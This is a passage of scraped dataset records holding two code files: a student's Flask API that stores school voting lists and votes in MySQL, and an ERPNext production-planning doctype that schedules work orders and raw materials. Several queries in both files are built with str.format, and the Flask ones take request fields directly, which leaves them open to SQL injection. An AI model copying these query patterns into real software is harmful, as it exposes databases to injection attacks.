print(info['nombre'])\n        query=\"INSERT INTO LISTA (lista_nombre) VALUES ('{}')\".format(info['nombre'])\n        cur.execute(query)\n        mysql.connection.commit()\n        cur.close()\n        \n        # convert to a JSON response with jsonify\n        return jsonify({'message': 'Se agrego con exito', 'content': info})\n    else:\n        \n        return jsonify({'message': 'Faltan valores'})\n    \n\n@app.route('/colegio/traer_lista/')\n\ndef traer_lista():\n    cur = mysql.connection.cursor()\n    cur.execute(\"SELECT *from lista\")\n    data = cur.fetchall()\n    cur.close()\n    print(data)\n    \n    return jsonify(data)\n\n\n@app.route('/lista/agregarvoto', methods=['POST'])\ndef agregar_voto():\n    info = request.get_json()\n    if(info['id'] and info['lista'] and info['fecha']):\n        # Create a database connection\n        cur = mysql.connection.cursor()\n        print(info)\n        query=\"INSERT INTO VOTO ( est_id,lista_id , lista_fecha) VALUES ({0},{1},'{2}')\".format(info['id'],info['lista'],info['fecha'])\n        cur.execute(query)\n        mysql.connection.commit()\n        cur.close()\n        \n        # convert to a JSON response with jsonify\n        return jsonify({'message': 'Se agrego con exito', 'content': info})\n    else:\n        \n        return jsonify({'message': 'Faltan valores'})\n    \n    \n@app.route('/lista/mostrarvotos/')\n\ndef mostrar_votos():\n    cur = mysql.connection.cursor()\n    cur.execute(\"SELECT *from voto\")\n    data = cur.fetchall()\n    cur.close()\n    print(data)\n    \n    return jsonify(data)\n    \n    \napp.run(debug = True) \n","repo_name":"GuidoTorres/codigo8","sub_path":"Semana7/Dia1-backend/practicando-flask.py","file_name":"practicando-flask.py","file_ext":"py","file_size_in_byte":2843,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"}
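A sketch of exercising the /lista/agregar route above with the requests library; the host and port assume Flask's development-server defaults, and the list name is invented:

import requests

resp = requests.post('http://127.0.0.1:5000/lista/agregar',
                     json={'nombre': 'Lista Verde'})   # payload key expected by agregar_lista
print(resp.json())   # {'message': 'Se agrego con exito', 'content': {...}} on success
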
 +{"seq_id":"73342866647","text":"import frappe\nfrom frappe.model.document import Document\nfrom frappe import _, msgprint\nfrom frappe.utils import (\n\tadd_days,\n\tceil,\n\tcint,\n\tcomma_and,\n\tflt,\n\tget_link_to_form,\n\tgetdate,\n\tnow_datetime,\n\tnowdate,today,formatdate, get_first_day, get_last_day \n)\nfrom dateutil.relativedelta import relativedelta\nfrom frappe.utils import (\n\tcint,\n\tdate_diff,\n\tflt,\n\tget_datetime,\n\tget_link_to_form,\n\tgetdate,\n\tnowdate,\n\ttime_diff_in_hours,\n)\nfrom erpnext.manufacturing.doctype.manufacturing_settings.manufacturing_settings import (\n\tget_mins_between_operations,\n)\nfrom datetime import date,timedelta\nfrom erpnext.manufacturing.doctype.bom.bom import get_children, validate_bom_no\nimport datetime\nfrom erpnext.stock.doctype.item.item import get_item_defaults, get_last_purchase_details\nimport openpyxl\nfrom io import BytesIO\nfrom openpyxl import Workbook\nfrom frappe.utils import now\nfrom openpyxl.styles import Font\nfrom openpyxl.utils import get_column_letter\nfrom copy import deepcopy\n\nclass ProductionPlanningWithLeadTime(Document):\n\tdef onload(self):\n\t\tmr_doc = frappe.db.get_value(\"Material Request\", {\"production_planning_with_lead_time\":self.name}, \"name\")\n\t\tif mr_doc:\n\t\t\tupdate_mr_status_in_raw_materials_table(self, mr_doc)\n\t\n\tdef on_submit(self):\n\t\tfrappe.db.set_value(\"Production Planning With Lead Time\",self.name,\"status\",\"Submitted\")\n\t\tfrappe.db.commit()\n\t\tself.reload()\n\n\tdef on_cancel(self):\n\t\tfrappe.db.set_value(\"Production Planning With Lead Time\",self.name,\"status\",\"Cancelled\")\n\t\tfrappe.db.commit()\n\t\tself.reload()\n\t\n\t@frappe.whitelist()\n\tdef get_open_sales_orders(self):\n\t\t\"\"\" Pull sales orders which are pending to deliver based on criteria selected\"\"\"\n\t\tself.sales_order_table = ''\n\t\topen_so = get_sales_orders(self)\n\t\topen_mr = get_open_mr(self)\n\t\t\n\t\tif open_so or open_mr:\n\t\t\tself.add_so_in_table(open_so,open_mr)\n\t\telse:\n\t\t\tfrappe.msgprint(_(\"Sales Orders and Material Requests are not available for production\"))\n\t@frappe.whitelist()\n\tdef add_so_in_table(self, open_so,open_mr):\n\t\t\"\"\" Add sales orders in the table\"\"\"\n\t\tself.set('sales_order_table', [])\n\t\tif open_so != []:\n\t\t\tfor data in open_so:\n\t\t\t\tbom_data = frappe.db.sql(\"\"\"SELECT name,makeup_days from `tabBOM` where item = '{0}' and is_active = 1 and is_default =1 and docstatus = 1\"\"\".format(data.get(\"item_code\")),as_dict=1)\n\t\t\t\tdn_date = data.get('delivery_date')\n\t\t\t\ttoday_date = date.today()\n\t\t\t\t# Calculate Days to Deliver\n\t\t\t\tdays_to_deliver = (dn_date - today_date)\n\t\t\t\tself.append('sales_order_table', {\n\t\t\t\t\t'sales_order': data.get(\"name\"),\n\t\t\t\t\t'item':data.get('item_code'),\n\t\t\t\t\t'delivery_date':data.get('delivery_date'),\n\t\t\t\t\t'qty':data.get('qty'),\n\t\t\t\t\t'bom':bom_data[0].get('name'),\n\t\t\t\t\t'makeup_days':bom_data[0].get('makeup_days'),\n\t\t\t\t\t'days_to_deliver' : days_to_deliver.days,\n\t\t\t\t\t'sales_order_item':data.get('sales_order_item')\n\t\t\t\t})\n\t\tif open_mr != []:\n\t\t\tfor data in open_mr:\n\t\t\t\tbom_data = frappe.db.sql(\"\"\"SELECT name,makeup_days from `tabBOM` where item = '{0}' and is_active = 1 and is_default =1 and docstatus = 1\"\"\".format(data.get(\"item_code\")),as_dict=1)\n\t\t\t\tdn_date = data.get('delivery_date')\n\t\t\t\ttoday_date = date.today()\n\t\t\t\t# Calculate Days to Deliver\n\t\t\t\tdays_to_deliver = (dn_date - today_date)\n\t\t\t\tself.append('sales_order_table', {\n\t\t\t\t\t'material_request': data.get(\"name\"),\n\t\t\t\t\t'item':data.get('item_code'),\n\t\t\t\t\t'delivery_date':data.get('delivery_date'),\n\t\t\t\t\t'qty':data.get('qty'),\n\t\t\t\t\t'bom':bom_data[0].get('name'),\n\t\t\t\t\t'makeup_days':bom_data[0].get('makeup_days'),\n\t\t\t\t\t'days_to_deliver' : days_to_deliver.days,\n\t\t\t\t\t'material_request_item':data.get('material_request_item')\n\t\t\t\t})\n\t\t# self.save()\n\t\treturn self.sales_order_table\n\t@frappe.whitelist()\n\tdef sort_so_data(self):\n\t\t# sort so data based on delivery_date and priority\n\t\tself.sorted_sales_order_table = ''\n\t\tif self.sales_order_table:\n\t\t\tso_data = []\n\t\t\tfor row in self.sales_order_table:\n\t\t\t\tso_data.append({\n\t\t\t\t\t'sales_order':row.sales_order,\n\t\t\t\t\t'item':row.item,\n\t\t\t\t\t'qty':row.qty,\n\t\t\t\t\t'delivery_date':row.delivery_date,\n\t\t\t\t\t'priority':row.priority,\n\t\t\t\t\t'bom':row.bom,\n\t\t\t\t\t'days_to_deliver':row.days_to_deliver,\n\t\t\t\t\t'makeup_days':row.makeup_days,\n\t\t\t\t\t'sales_order_item':row.sales_order_item,\n\t\t\t\t\t'material_request':row.material_request,\n\t\t\t\t\t'material_request_item':row.material_request_item\n\t\t\t\t\t})\n\t\t\t# so_data = frappe.db.sql(\"\"\"SELECT * from `tabSales Order Table` where parent = '{0}'\"\"\".format(self.name),as_dict=1)\n\t\t\tsorted_so_data = sorted(so_data, key = lambda x: (x[\"delivery_date\"],x[\"priority\"]))\n\t\t\tcount = 1\n\t\t\tfor row in sorted_so_data:\n\t\t\t\trow.update({'idx':count})\n\t\t\t\tself.append('sorted_sales_order_table',row)\n\t\t\t\tcount = count + 1\n\t\treturn self.sorted_sales_order_table\n\t@frappe.whitelist()\n\tdef work_order_planning(self):\n\t\tself.fg_items_table = ''\n\t\t# fetch warehouse list from Rushabh settings\n\t\twarehouse_list = get_warehouses()\n\t\t# Get On hand stock\n\t\tohs = get_ohs(warehouse_list)\n\t\t# Get allocated 
available_stock\n\t\tallocated_ohs = get_allocated_ohs_fg()\n\t\t# Get Planned Stock\n\t\tplanned_data = self.get_planned_data_fg()\n\t\t# Get allocated Planned Stock\n\t\tallocated_planned_stock = get_allocated_planned_stock_fg()\n\t\t# Get actual available_stock\n\t\tohs = get_actual_ohs(ohs,allocated_ohs)\n\t\t# Get actual planned data for FG\n\t\tplanned_data = get_actual_planned_fg(planned_data,allocated_planned_stock)\n\t\tif self.sales_order_table:\n\t\t\tfg_data = []\n\t\t\tfor row in self.sales_order_table:\n\t\t\t\tfg_data.append({\n\t\t\t\t\t'sales_order':row.sales_order,\n\t\t\t\t\t'material_request':row.material_request,\n\t\t\t\t\t'item':row.item,\n\t\t\t\t\t'qty':row.qty,\n\t\t\t\t\t'delivery_date':row.delivery_date,\n\t\t\t\t\t'priority':row.priority,\n\t\t\t\t\t'bom':row.bom,\n\t\t\t\t\t'days_to_deliver':row.days_to_deliver,\n\t\t\t\t\t'makeup_days':row.makeup_days,\n\t\t\t\t\t'sales_order_item':row.sales_order_item,\n\t\t\t\t\t'material_request_item':row.material_request_item\n\t\t\t\t\t})\n\t\t# fg_data = frappe.db.sql(\"\"\"SELECT * from `tabSales Order Table` where parent = '{0}'\"\"\".format(self.name),as_dict=1)\n\t\tif fg_data:\n\t\t\tfg_data = sorted(fg_data, key = lambda x: (x[\"delivery_date\"],x[\"priority\"]))\n\t\t\tcount = 1\n\t\t\tfor row in fg_data:\n\t\t\t\tqty = flt(row.get(\"qty\")) - flt(ohs.get(row.get(\"item\"))) if flt(ohs.get(row.get(\"item\"))) < flt(row.get(\"qty\")) else 0\n\t\t\t\trow.update({'planned_qty':qty,'available_stock':ohs.get(row.get('item')),'already_planned_qty':planned_data.get(row.get('item')),'shortage':qty})\n\t\t\t\tremaining_qty = flt(ohs.get(row.get(\"item\"))) - flt(row.get(\"qty\")) if flt(ohs.get(row.get(\"item\"))) > flt(row.get(\"qty\")) else 0\n\t\t\t\tohs.update({row.get('item'):remaining_qty})\n\t\t\t\tplanned_allocate = flt(qty) - flt(planned_data.get(row.get(\"item\"))) if flt(planned_data.get(row.get(\"item\"))) < flt(qty) else 0\n\t\t\t\trow.update({'planned_qty':planned_allocate,'shortage':planned_allocate})\n\t\t\t\tremainingg_qty = flt(planned_data.get(row.get(\"item\"))) - flt(qty) if flt(planned_data.get(row.get(\"item\"))) > flt(qty) else 0\n\t\t\t\tplanned_data.update({row.get('item'):remainingg_qty})\n\t\t\t\toperation_time = frappe.db.sql(\"\"\"SELECT sum(time_in_mins) as operation_time from `tabBOM Operation` where parent = '{0}'\"\"\".format(row.get('bom')),as_dict=1)\n\t\t\t\ttotal_operation_time_in_mins = flt(operation_time[0].get('operation_time'))*row.get('planned_qty')\n\t\t\t\ttotal_operation_time_in_days = ceil(total_operation_time_in_mins/480)\n\t\t\t\t# Calculate date_to_be_ready\n\t\t\t\tdelivery_date = datetime.datetime.strptime(row.get('delivery_date'), '%Y-%m-%d')\n\t\t\t\tdelivery_date = delivery_date.date() \n\t\t\t\tdate_to_be_ready = (delivery_date-timedelta(total_operation_time_in_days)-timedelta(row.get('makeup_days')))\n\n\t\t\t\t#calculate partial stock and workstation availability\n\t\t\t\tpartial_qty_dict=get_partial_qty(date_to_be_ready, row.get(\"item\"), warehouse_list)\n\n\t\t\t\tpartial_workstation_availability=check_partial_workstation_availability(date_to_be_ready,row.get('bom'), row.get('planned_qty'))\n\t\t\t\tpartial_remark = \"{0}{1}\".format(partial_qty_dict.get(\"partial_remark\"), partial_workstation_availability.get(\"remark\") if partial_workstation_availability else \"\")\n\t\t\t\t\n\t\t\t\tdate_dict = 
check_workstation_availability(date_to_be_ready,row.get('bom'),row.get('planned_qty'))\n\t\t\t\trow.update({'idx':count,'total_operation_time':total_operation_time_in_days,'date_to_be_ready':date_to_be_ready, 'partial_remark':partial_remark})\n\n\t\t\t\tif date_dict:\n\t\t\t\t\trow.update({'planned_start_date':date_dict.get('planned_start_date'),'remark':date_dict.get('remark')})\n\t\t\t\telse:\n\t\t\t\t\trow.update({'planned_start_date':date_to_be_ready})\n\t\t\t\tself.append('fg_items_table',row)\n\t\t\t\tcount = count + 1\n\t\t\treturn self.fg_items_table\n\t@frappe.whitelist()\n\tdef sub_assembly_items(self):\n\t\tself.sub_assembly_items_table = ''\n\t\twarehouse_list = get_warehouses()\n\t\t# Get On hand stock\n\t\tohs = get_ohs(warehouse_list)\n\t\t# Get allocated available_stock\n\t\tallocated_ohs = get_allocated_ohs_sfg()\n\t\t# Get Planned Stock\n\t\tplanned_data = self.get_planned_data_fg()\n\t\t# Get actual available_stock\n\t\tohs = get_actual_ohs(ohs,allocated_ohs)\n\t\tif self.fg_items_table:\n\t\t\tfor row in self.fg_items_table:\n\t\t\t\tbom_data = []\n\t\t\t\tif row.get('planned_qty') > 0:\n\t\t\t\t\tdate_to_be_ready = datetime.datetime.strptime(row.get('planned_start_date'), '%Y-%m-%d')\n\t\t\t\t\tplanned_start_date = date_to_be_ready.date()\n\t\t\t\t\tget_sub_assembly_item(row.get(\"bom\"), bom_data, row.get(\"planned_qty\"),planned_start_date,row.name, warehouse_list)\n\t\t\t\t\tbom_data = sorted(bom_data, key = lambda x: x[\"bom_level\"],reverse=1)\n\t\t\t\t\tfor item in bom_data:\n\t\t\t\t\t\tfinal_row = dict()\n\t\t\t\t\t\tqty = flt(item.get(\"stock_qty\")) - flt(ohs.get(item.get(\"production_item\"))) if flt(ohs.get(item.get(\"production_item\"))) < flt(item.get(\"stock_qty\")) else 0\n\t\t\t\t\t\tfinal_row.update({'qty':qty,'available_stock':ohs.get(item.get('production_item')),'alreaady_planned_qty':planned_data.get(item.get('production_item')),'shortage':qty,'fg_item':item.get('parent_item_code'),'item':item.get('production_item'),'original_qty':item.get('stock_qty'),'bom':item.get('bom_no'),'sales_order':row.get('sales_order'),'material_request':row.get('material_request')})\n\t\t\t\t\t\tremaining_qty = flt(ohs.get(item.get(\"production_item\"))) - flt(item.get(\"stock_qty\")) if flt(ohs.get(item.get(\"production_item\"))) > flt(item.get(\"stock_qty\")) else 0\n\t\t\t\t\t\tohs.update({item.get('production_item'):remaining_qty})\n\t\t\t\t\t\tplanned_allocate = flt(qty) - flt(planned_data.get(item.get(\"production_item\"))) if flt(planned_data.get(item.get(\"production_item\"))) < flt(qty) else 0\n\t\t\t\t\t\tfinal_row.update({'qty':planned_allocate,'shortage':planned_allocate})\n\t\t\t\t\t\tremainingg_qty = flt(planned_data.get(item.get(\"production_item\"))) - flt(qty) if flt(planned_data.get(item.get(\"production_item\"))) > flt(qty) else 0\n\t\t\t\t\t\tplanned_data.update({item.get('production_item'):remainingg_qty})\n\t\t\t\t\t\t# operation_time = frappe.db.sql(\"\"\"SELECT sum(time_in_mins) as operation_time from `tabBOM Operation` where parent = '{0}'\"\"\".format(item.get('bom_no')),as_dict=1)\n\t\t\t\t\t\t# total_operation_time_in_mins = flt(operation_time[0].get('operation_time'))*final_row.get('qty')\n\t\t\t\t\t\t# total_operation_time_in_days = ceil(total_operation_time_in_mins/480)\n\t\t\t\t\t\t# makeup_days = frappe.db.get_value(\"BOM\",{'name':item.get('bom_no')},'makeup_days')\n\t\t\t\t\t\t# date_to_be_ready = datetime.datetime.strptime(row.get('date_to_be_ready'), '%Y-%m-%d')\n\t\t\t\t\t\t# date_to_be_ready = date_to_be_ready.date()\n\t\t\t\t\t\t# 
date_to_be_ready = (date_to_be_ready-timedelta(total_operation_time_in_days)-timedelta(makeup_days))\n\t\t\t\t\t\tfinal_row.update({'total_operation_time':item.get('total_operation_time'),'date_to_be_ready':item.get('date_to_be_ready'),'planned_start_date':item.get('planned_start_date'),'fg_row_name':item.get('row_name'),'remark':item.get('remark'), 'partial_remark':item.get('partial_remark'),'parent_item_code':row.get('item')})\n\t\t\t\t\t\tself.append('sub_assembly_items_table',final_row)\n\t\t\treturn self.sub_assembly_items_table\n\t\t\t\t\t\t\n\t@frappe.whitelist()\n\tdef get_raw_materials(self):\n\t\tself.raw_materials_table = ''\n\t\twarehouse_list = get_warehouses()\n\t\t# Get On hand stock\n\t\tohs = get_ohs(warehouse_list)\n\t\t# Get allocated available_stock\n\t\tallocated_ohs = get_allocated_ohs_raw()\n\t\t# Get actual available_stock\n\t\tohs = get_actual_ohs(ohs,allocated_ohs)\n\t\tif self.sub_assembly_items_table:\n\t\t\tfor row in self.sub_assembly_items_table:\n\t\t\t\traw_data = []\n\t\t\t\tget_raw_items(row.bom,raw_data,row.qty)\n\t\t\t\tremaining_dict = dict()\n\t\t\t\tfor item in raw_data:\n\t\t\t\t\tlead_time = frappe.db.get_value(\"Item\",{'name':item.get('item')},'lead_time_days')\n\t\t\t\t\titem.update({'available_stock':ohs.get(item.get('item')),'lead_time':lead_time,'original_qty':item.get('qty')})\n\t\t\t\t\trm_readiness_days = frappe.db.get_single_value(\"Rushabh Settings\",'rm_readiness_days')\n\t\t\t\t\tdate_to_be_ready = datetime.datetime.strptime(row.get('planned_start_date'), '%Y-%m-%d')\n\t\t\t\t\tdate_to_be_ready = date_to_be_ready.date()\n\t\t\t\t\trequired_date = (date_to_be_ready-timedelta(rm_readiness_days))\n\t\t\t\t\titem.update({'date_to_be_ready':required_date})\n\t\t\t\t\ttoday_date = date.today()\n\t\t\t\t\t# Calculate Order in days\n\t\t\t\t\torder_in_days = (required_date - today_date)\n\t\t\t\t\titem.update({'order_in_days':order_in_days.days})\n\t\t\t\t\t# Allocate from available_stock\n\t\t\t\t\tqty = flt(item.get(\"qty\")) - flt(ohs.get(item.get(\"item\"))) if flt(ohs.get(item.get(\"item\"))) < flt(item.get(\"qty\")) else 0\n\t\t\t\t\tremainingg_qty = flt(ohs.get(item.get(\"item\"))) - flt(item.get(\"qty\")) if flt(ohs.get(item.get(\"item\"))) > flt(item.get(\"qty\")) else 0\n\t\t\t\t\tohs.update({item.get('item'):remainingg_qty})\n\t\t\t\t\titem.update({'shortage':qty,'qty':qty})\n\t\t\t\t\tif item.get('qty') == 0:\n\t\t\t\t\t\titem.update({'readiness_status':'#008000'})\n\t\t\t\t\t\titem.update({'latest_date_availability':today_date})\n\t\t\t\t\t\tself.append('raw_materials_table',item)\n\t\t\t\t\t\tcontinue\n\t\t\t\t\telse:\n\t\t\t\t\t\t# Allocate from planned_po nd mr of type Purchase\n\t\t\t\t\t\tif item.get('item') not in remaining_dict:\n\t\t\t\t\t\t\ton_order_stock,schedule_date_dict = get_on_order_stock(self,required_date)\n\t\t\t\t\t\t\t\n\t\t\t\t\t\t\tif item.get('item') in on_order_stock:\n\t\t\t\t\t\t\t\tqty = flt(item.get(\"qty\")) - flt(on_order_stock.get(item.get(\"item\"))) if flt(on_order_stock.get(item.get(\"item\"))) < flt(item.get(\"qty\")) else 0\n\t\t\t\t\t\t\t\t# print(\"=============item\",item.get('item'),qty)\n\n\t\t\t\t\t\t\t\t# if flt(item.get(\"qty\")) == 0:\n\t\t\t\t\t\t\t\t# \titem.update({'latest_date_availability':today_date})\n\t\t\t\t\t\t\t\t# elif qty == 0:\n\t\t\t\t\t\t\t\t# \titem.update({'latest_date_availability':schedule_date_dict.get(item.get('item'))})\n\t\t\t\t\t\t\t\t# else:\n\t\t\t\t\t\t\t\t# \tlatest_date_availability = today_date + timedelta(lead_time)\n\t\t\t\t\t\t\t\t# 
\titem.update({'latest_date_availability':latest_date_availability})\n\t\t\t\t\t\t\t\tremaining_qty = flt(on_order_stock.get(item.get('item'))) - item.get('qty') \n\t\t\t\t\t\t\t\tremaining_dict[item.get('item')] = remaining_qty if remaining_qty > 0 else 0\n\t\t\t\t\t\t\t\titem.update({'qty':qty,'on_order_stock':on_order_stock.get(item.get(\"item\")),'shortage':qty})\n\t\t\t\t\t\t\t\titem.update({'latest_date_availability':schedule_date_dict.get(item.get('item'))})\n\t\t\t\t\t\t\t\titem.update({'readiness_status':'#FFA500'})\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\tlatest_date_availability = today_date + timedelta(lead_time)\n\t\t\t\t\t\t\t\titem.update({'latest_date_availability':latest_date_availability,'readiness_status':'#FF0000'})\n\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tvirtual_stock = remaining_dict.get(item.get('item'))\n\t\t\t\t\t\t\tqty = flt(item.get(\"qty\")) - flt(virtual_stock) if flt(virtual_stock) < flt(item.get(\"qty\")) else 0\n\t\t\t\t\t\t\tremaining_qty = virtual_stock - item.get('qty')\n\n\t\t\t\t\t\t\tremaining_dict[item.get('item')] = remaining_qty if remaining_qty > 0 else 0\n\t\t\t\t\t\t\titem.update({'qty':qty,'on_order_stock':virtual_stock,'shortage':qty})\n\t\t\t\t\t\t\titem.update({'latest_date_availability':schedule_date_dict.get(item.get('item'))})\n\t\t\t\t\t\t\titem.update({'readiness_status':'#FFA500'})\n\t\t\t\t\t\t# if item.get('latest_date_availability'):\n\t\t\t\t\t\t# \tlatest_date_availability_in_days = (item.get('latest_date_availability') - today_date).days\n\t\t\t\t\t\t# \treadiness_status = (item.get('date_to_be_ready')-item.get('latest_date_availability'))\n\t\t\t\t\t\t# \tif readiness_status.days > 0:\n\t\t\t\t\t\t# \t\titem.update({'readiness_status':'#008000'})\n\t\t\t\t\t\t# \telif readiness_status.days < 0:\n\t\t\t\t\t\t# \t\titem.update({'readiness_status':'#FFA500'})\n\t\t\t\t\t\t# \telse:\n\t\t\t\t\t\t# \t\titem.update({'readiness_status':'#FF8000'})\n\t\t\t\t\t\t# else:\n\t\t\t\t\t\t# \titem.update({'readiness_status':'#FF0000'})\n\t\t\t\t\t\t# if item.get('qty') == 0:\n\t\t\t\t\t\t# \titem.update({'readiness_status':'#008000'})\n\t\t\t\t\t\t# \titem.update({'latest_date_availability':today_date})\n\t\t\t\t\t\n\t\t\t\t\t\n\t\t\t\t\t\n\t\t\t\t\tself.append('raw_materials_table',item)\n\t\t\treturn self.raw_materials_table\n\t@frappe.whitelist()\n\tdef prepare_final_work_orders(self):\n\t\tif self.fg_items_table:\n\t\t\titem_list = []\n\t\t\tfor row in self.fg_items_table:\n\t\t\t\tfg_item_dict = dict()\n\t\t\t\tif row.planned_qty > 0:\n\t\t\t\t\tfor item in self.sub_assembly_items_table:\n\t\t\t\t\t\titem_dict = dict()\n\t\t\t\t\t\tif item.sales_order == row.sales_order and item.qty >0 and item.fg_row_name == row.name:\n\t\t\t\t\t\t\titem_dict.update({\n\t\t\t\t\t\t\t\t'item':item.item,\n\t\t\t\t\t\t\t\t'qty':item.qty,\n\t\t\t\t\t\t\t\t'sales_order':item.sales_order,\n\t\t\t\t\t\t\t\t'material_request':item.material_request,\n\t\t\t\t\t\t\t\t'bom':item.bom,\n\t\t\t\t\t\t\t\t'total_operation_time':item.total_operation_time,\n\t\t\t\t\t\t\t\t'date_to_be_ready':item.planned_start_date,\n\t\t\t\t\t\t\t\t'is_subassembly' : 
1,\n\t\t\t\t\t\t\t\t'parent_item_code':row.item\n\t\t\t\t\t\t\t\t})\n\t\t\t\t\t\t\titem_list.append(item_dict)\n\t\t\t\t\tfg_item_dict.update({\n\t\t\t\t\t\t'item':row.item,\n\t\t\t\t\t\t'qty':row.planned_qty,\n\t\t\t\t\t\t'sales_order':row.sales_order,\n\t\t\t\t\t\t'sales_order_item':row.sales_order_item,\n\t\t\t\t\t\t'material_request':row.material_request,\n\t\t\t\t\t\t'material_request_item':row.material_request_item,\n\t\t\t\t\t\t'bom':row.bom,\n\t\t\t\t\t\t'total_operation_time':row.total_operation_time,\n\t\t\t\t\t\t'date_to_be_ready':row.planned_start_date,\n\t\t\t\t\t\t'is_subassembly':0,\n\t\t\t\t\t\t'parent_item_code':row.item\n\t\t\t\t\t\t})\t\t\t\t\t\n\t\t\t\t\titem_list.append(fg_item_dict)\n\t\t\tcount = 1\n\t\t\tfor row in item_list:\n\t\t\t\trow.update({'idx':count})\n\t\t\t\tself.append(\"final_work_orders\",row)\n\t\t\t\tcount = count + 1\n\t\t\treturn self.final_work_orders\n\t@frappe.whitelist()\n\tdef create_work_order(self):\n\t\tif self.final_work_orders:\n\t\t\tfrom erpnext.manufacturing.doctype.work_order.work_order import get_default_warehouse\n\t\t\two_list= []\n\t\t\tdefault_warehouses = get_default_warehouse()\n\t\t\tself.make_work_order_for_finished_goods(wo_list, default_warehouses)\n\t\t\tself.show_list_created_message(\"Work Order\", wo_list)\n\t\t\tfrappe.db.set_value(\"Production Planning With Lead Time\",self.name,'status','In Progress')\n\t\t\tfrappe.db.commit()\n\t\telse:\n\t\t\tfrappe.msgprint(\"Please Prepare for Final Work Orders\")\n\tdef make_work_order_for_finished_goods(self, wo_list, default_warehouses):\n\t\titems_data = self.get_production_items()\n\t\tfor key, item in items_data.items():\n\t\t\tset_default_warehouses(item, default_warehouses)\n\t\t\two= frappe.db.get_value(\"Work Order\",{'production_item':item.get('production_item'),'so_reference':item.get('so_reference')}) or frappe.db.get_value(\"Work Order\",{'production_item':item.get('production_item'),'mr_reference':item.get('mr_reference')})\n\t\t\tif not wo: \n\t\t\t\twork_order = self.create_work_orders(item)\n\t\t\t\tif work_order:\n\t\t\t\t\two_list.append(work_order)\n\t\t\t\t\t#Add WO Status on Final Work Order Table \n\t\t\t\t\two_status = frappe.db.get_value(\"Work Order\", work_order, \"status\")\n\t\t\t\t\tfrappe.db.set_value(\"Final Work Orders\", {'item':item.get('production_item'), 'sales_order':item.get('so_reference')}, \"wo_status\", wo_status)\n\t\t\t\t\tfrappe.db.set_value(\"Final Work Orders\", {'item':item.get('production_item'), 'sales_order':item.get('so_reference')}, \"work_order\", work_order)\n\n\t\t\t\t\tfrappe.db.set_value(\"Final Work Orders\", {'item':item.get('production_item'), 'material_request':item.get('mr_reference')}, \"wo_status\", wo_status)\n\t\t\t\t\tfrappe.db.set_value(\"Final Work Orders\", {'item':item.get('production_item'), 'material_request':item.get('mr_reference')}, \"work_order\", work_order)\n\n\t\t\t\t\t\n\t\t\t\t\tfrappe.db.commit()\n\t\t\telse:\n\t\t\t\two_status = frappe.db.get_value(\"Work Order\", wo, \"status\")\n\t\t\t\tfrappe.db.set_value(\"Final Work Orders\", {'item':item.get('production_item'), 'sales_order':item.get('so_reference')}, \"wo_status\", wo_status)\n\t\t\t\tfrappe.db.set_value(\"Final Work Orders\", {'item':item.get('production_item'), 'sales_order':item.get('so_reference')}, \"work_order\", wo)\n\t\t\t\tfrappe.db.set_value(\"Final Work Orders\", {'item':item.get('production_item'), 'material_request':item.get('mr_reference')}, \"wo_status\", wo_status)\n\t\t\t\tfrappe.db.set_value(\"Final Work Orders\", 
{'item':item.get('production_item'), 'material_request':item.get('mr_reference')}, \"work_order\", wo)\n\t\t\t\tfrappe.db.commit()\n\t\t\t\two = get_link_to_form(\"Work Order\", wo)\n\t\t\t\tso = get_link_to_form(\"Sales Order\",item.get('so_reference'))\n\t\t\t\tmsgprint(_(\"Work Order {0} is already created for the item {1} and Sales Order {2}\").format(wo,item.get(\"production_item\"),so))\n\t\t\t\t# frappe.msgprint(\"Work Order {0} is already created for this item {1}\".format(wo,item.get(\"production_item\")))\n\tdef get_production_items(self):\n\t\titem_dict = {}\n\t\tdefault_company = frappe.db.get_single_value(\"Global Defaults\", \"default_company\")\n\t\tfor d in self.final_work_orders:\n\t\t\titem_data = get_item_defaults(d.item, default_company)\n\t\t\titem_details = {\n\t\t\t\t\"production_item\": d.item,\n\t\t\t\t\"use_multi_level_bom\": 0,\n\t\t\t\t\"sales_order\": d.sales_order if d.is_subassembly == 0 else None,\n\t\t\t\t\"so_reference\":d.sales_order,\n\t\t\t\t\"sales_order_item\": d.sales_order_item,\n\t\t\t\t\"bom_no\": d.bom,\n\t\t\t\t\"description\": item_data.get('description'),\n\t\t\t\t\"stock_uom\": item_data.get('stock_uom'),\n\t\t\t\t\"company\": default_company,\n\t\t\t\t\"planned_start_date\": d.date_to_be_ready,\n\t\t\t\t\"qty\":d.qty,\n\t\t\t\t\"production_planning_with_lead_time\":self.name,\n\t\t\t\t\"material_request\":d.material_request if d.is_subassembly == 0 else None,\n\t\t\t\t\"material_request_item\":d.material_request_item,\n\t\t\t\t\"mr_reference\":d.material_request,\n\t\t\t\t\"parent_item_code\":d.parent_item_code\n\t\t\t}\n\t\t\tif d.sales_order:\n\t\t\t\titem_dict[(d.item, d.sales_order)] = item_details\n\t\t\telse:\n\t\t\t\titem_dict[(d.item, d.material_request)] = item_details\n\n\t\treturn item_dict\n\n\tdef create_work_orders(self, item):\n\t\tfrom erpnext.manufacturing.doctype.work_order.work_order import OverProductionError\n\t\two = frappe.new_doc(\"Work Order\")\n\t\two.update(item)\n\t\two.planned_start_date = item.get(\"planned_start_date\") or item.get(\"schedule_date\")\n\t\t# check item group to set the default target warehouse\n\t\titem_group = frappe.db.get_value(\"Item\",{'item_code':item.get('production_item')},'item_group')\n\n\t\tif item.get(\"warehouse\"):\n\t\t\two.fg_warehouse = item.get(\"warehouse\")\n\t\t# if the item belongs to a subassembly, use the WIP warehouse as the target warehouse\n\t\tif item_group != 'Product':\n\t\t\two.fg_warehouse = item.get('wip_warehouse')\n\n\t\two.set_work_order_operations()\n\t\two.set_required_items()\n\n\t\ttry:\n\t\t\two.flags.ignore_mandatory = True\n\t\t\two.flags.ignore_validate = True\n\t\t\two.insert()\n\t\t\treturn wo.name\n\t\texcept OverProductionError:\n\t\t\tpass\n\tdef show_list_created_message(self, doctype, doc_list=None):\n\t\tif not doc_list:\n\t\t\treturn\n\n\t\tfrappe.flags.mute_messages = False\n\t\tif doc_list:\n\t\t\tdoc_list = [get_link_to_form(doctype, p) for p in doc_list]\n\t\t\tmsgprint(_(\"{0} created\").format(comma_and(doc_list)))\n\n\tdef get_planned_data_fg(self):\n\t\tplanned_data = frappe.db.sql(\"\"\"SELECT i.item,sum(i.planned_qty) as qty from `tabFG Items Table` i join `tabProduction Planning With 